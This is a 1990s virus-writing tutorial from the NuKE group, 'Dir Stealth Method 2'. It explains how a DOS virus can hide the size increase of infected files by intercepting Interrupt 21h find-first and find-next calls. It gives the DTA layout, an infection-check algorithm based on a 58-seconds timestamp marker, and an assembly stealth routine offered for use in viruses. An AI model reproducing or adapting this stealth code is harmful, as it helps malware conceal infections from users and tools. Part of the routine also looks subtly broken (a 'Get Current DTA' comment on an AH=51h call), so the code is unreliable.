******************************* ** Dir Stealth Method 2 ** ** ** ** By Rock Steady/NuKE ** ******************************* Some May notice that when they use PCTOOLs (aka PCSHELL) or Peter Norton Utilities, or *SOME* File Managing systems like DOS-Shell, the File increase of infected files is know visable. There is no doubt about it, if you only put Method #1 in your virus you will encounter times were the file increase shows. Its not because your Routine isn't good! But due to the fact that there is another way to Read the Dir Listing by DOS. An this method is Call File-find by ASCIIZ format. We just learned how to edit File-Find by FCB. Which is used by MS-DOS PC-DOS and some other programs. But unlike the others, they use the ASCIIZ file-Find method as it is EASIER to open, close, edite, and any other file access routine is ALOT easier with the ASCIIZ or (File Handle) system. So we will make our Virus Stealth to Method #2! Making us 100% Stealth from file-finds... The Function we have to Intecept is Interrupt 21h, with Functions AH=4Eh (Find First Matching File) and AH=4F (Find Next Matching File) The Way to go about it is Very much ALIKE to the first one, so just understand the thoery, and you'll be able to program it within seconds. When this function is called, it will fill the current DTA with 12 entries totally 43 bytes. The DTA will be set up as follows: (below) BTW: DTA is only a place DOS uses to do Disk Transfer Areas! It ISN'T like the FCB, or PSP that is anyways the same! You can play with this as you wish. You also use this DTA to read the Command Line Parameters...etc... Offset Size Description ÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 00h ³ 1 ³ Drive Letter 01h ³ 11 ³ Seach Template (Eg:????????COM) 0Ch ³ 1 ³ Attribute Search 0Dh ³ 2 ³ Entry count within Directory 0Fh ³ 2 ³ Cluster Number of start of parent directory 11h ³ 4 ³ Reserved (Atleast Undocumented) 15h ³ 1 ³ Attribute of File FOUND @ 16h ³ 2 ³ File's Time (Bits : SSSS-SMMM-MMMH-HHHH) Sec/2:Month:Year 18h ³ 2 ³ File's Date (Bits : DDDD-DMMM-MYYY-YYYY) Day:Month:Year * 1Ah ³ 4 ³ File's Size (Word Reverse Order, Dah!!?!) 1Eh ³ 13 ³ ASCIIZ File name & Extension * = Must be Edited by Virus is File Infected @ = Needed to Check if File is Infected. (Seconds Field) %Algorthm% ~~~~~~~~~~ CONDISTION: DS:DX points to ASCIIZ of file search. CX: Contains File Attributes Step 1. Call Dos so it fills the DTA with its findings Step 2. Test for CF=1 (Carry Flag) as error happened errors happen if File not found, no more files etc... Step 3. Get Seconds Field And UnMask Seconds Step 4. Check if seconds = 58 (What ever your using) Quit if NOT Notice we use `XOR AL,1Dh' rather than `CMP AL,1Dh' Check in your ASM Bible, which is Faster? Size? Remember speed & size is EVERYTHING, That is why My lastest are quite small viriis for stealthness!! Step 5. If Infected Subtract Virus Size from File Step 6. Quit ;This is the routine. once you get AH=4Eh/4Fh in you Int 21h Call this ;Routine... (Look at Method #1 for Int21h handler) Dir_Stealth2 pushf ;Fake an Int Call push cs ;Save our location call int21Call ;Step #1 jc no_good ;Error Split push ax push bx push es mov ah,51h ;Get Current DTA int 21h ;ES:BX --> DTA mov ax,es:[bx+16h] ;Get File Time and ax,1fh ;Un Mask Seconds field xor al,1dh ;Is it 58 Seconds? jnz not_infected ;Not infected! Dah? sub es:[bx+1Ah],Virus_Size ;Minus Virus Size! sbb es:[bx+1Ch],0 ;Fix up the Sub, Carrying! not_infected: pop es pop bx ;Restore Registers pop ax no_Good:iret ; This code WORKS and is also 100% (c) Rock Steady / NuKE ;--------------------------EnD------------------------------- Rock Steady `WaTch OuT WaReZ PuPpiEs NuKE PoX V2.0 WiLl GeTcHa'